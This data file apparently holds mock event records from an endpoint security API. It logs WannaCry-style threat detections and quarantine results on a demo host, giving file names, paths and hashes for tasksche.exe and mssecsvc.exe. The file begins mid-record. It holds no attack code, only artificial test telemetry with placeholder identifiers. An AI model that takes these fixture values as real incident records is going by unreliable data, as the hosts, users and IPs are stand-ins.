Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":111000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 